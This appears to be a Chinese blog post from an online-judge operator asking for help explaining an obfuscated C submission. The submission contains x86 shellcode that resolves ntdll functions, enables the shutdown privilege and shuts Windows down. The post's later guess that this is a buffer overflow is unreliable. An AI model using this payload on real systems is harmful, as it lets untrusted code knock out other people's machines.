FanQijiang's Blog

牛逼代码崩溃Windows评测端

先展示一下这个牛逼代码

#define w char
#define d unsigned w
#define o void
#define z return
#define l int
#define j if
#define t typedef
#define u
o p1(){d c[29]={0x6A,0x02,0xB8,0xF9,0x00,0x00,0x00,0x8B,0xD4,0xCD,0x2E,0x83,0xC4,0x04,0x6A,0x02,0xB8,0xD9,0x00,0x00,0x00,0x8B,0xD4,0xCD,0x2E,0x83,0xC4,0x04,0xC3};t o(*F)();F pF;(pF=(F)(o*)c)();}
l p2(w *v1){d c[44]={0x55,0x8B,0xEC,0x51,0x56,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x8B,0x75,0x08,0x50,0x33,0xC0,0x99,0xFC,0xAC,0x84,0xC0,0x74,0x07,0xC1,0xCA,0x0D,0x03,0xD0,0xEB,0xF4,0x58,0x89,0x55,0xFC,0x8B,0x45,0xFC,0x5E,0x8B,0xE5,0x5D,0xC3};t l(*F)(w*);F pF;z(pF=(F)(o*)c)(v1);}
l p3(l v1,l v2){d c[134]={0x55,0x8B,0xEC,0x51,0x53,0x56,0x57,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xFF,0x75,0x0C,0xFF,0x75,0x08,0x8D,0x8D,0xFC,0xFF,0xFF,0xFF,0x51,0xE8,0x02,0x00,0x00,0x00,0xEB,0x5A,0x60,0x8B,0x6C,0x24,0x2C,0x8B,0x45,0x3C,0x8B,0x7C,0x05,0x78,0x03,0xFD,0x8B,0x4F,0x18,0x8B,0x5F,0x20,0x03,0xDD,0xE3,0x2B,0x49,0x8B,0x34,0x8B,0x03,0xF5,0xE8,0x24,0x00,0x00,0x00,0x3B,0x54,0x24,0x28,0x75,0xED,0x8B,0x5F,0x24,0x03,0xDD,0x66,0x8B,0x0C,0x4B,0x8B,0x5F,0x1C,0x03,0xDD,0x8B,0x04,0x8B,0x03,0xC5,0xFF,0x74,0x24,0x24,0x5B,0x89,0x03,0x61,0xC2,0x0C,0x00,0x50,0x33,0xC0,0x99,0xFC,0xAC,0x84,0xC0,0x74,0x07,0xC1,0xCA,0x0D,0x03,0xD0,0xEB,0xF4,0x58,0xC3,0x8B,0x45,0xFC,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC3};t l(*F)(l,l);F pF;z(pF=(F)(o*)c)(v1,v2);}
l p4(){d c[36]={0x56,0x33,0xD2,0x64,0xA1,0x30,0x00,0x00,0x00,0x85,0xC0,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x40,0x08,0xEB,0x09,0x8B,0x40,0x34,0x83,0xC0,0x7C,0x8B,0x40,0x3C,0x5E,0xC3};t l(*F)();F pF;z(pF=(F)(o*)c)();}
l main(){w c[]={0x47,0x65,0x74,0x4D,0x6F,0x64,0x75,0x6C,0x65,0x48,0x61,0x6E,0x64,0x6C,0x65,0x41,0x00,0x52,0x74,0x6C,0x41,0x64,0x6A,0x75,0x73,0x74,0x50,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x00,0x6E,0x74,0x64,0x6C,0x6C,0x00,0x4E,0x74,0x53,0x68,0x75,0x74,0x64,0x6F,0x77,0x6E,0x53,0x79,0x73,0x74,0x65,0x6D,0x00};
t l(u*F1)(w*);F1 f1;t o(u*F3)(l);F3 f3;t l(u*F2)(l,l,l,l*);F2 f2;l k=p4();j(!k)z(10001);f1=(F1)(o*)p3(p2(c),k);j(!f1){z(10002);}f2=(F2)(o*)p3(p2(c+0x11),f1(c+0x24));j(!f2){z(10003);}j(f2(19,1,1,&k)==0x0C000007C){f2(19,1,0,&k);}f3=(F3)(o*)p3(p2(c+42),f1(c+0x24));j(!f3){z(10005);}f3(2);z(10000);}

神牛求解
OS : WinXp SP3 和 Win 2003
Windows下运行后直接关机

已禁止子进程和程序对系统关机函数的调用。

11 April 2010补充：看样子应该是缓冲区溢出攻击了，低权限用户似乎是搞不定的

牛逼代码崩溃Windows评测端

Leave a comment

Pages

Categories

My Tweets

Tags

My Location

LINK

Meta

IPv4 CountDown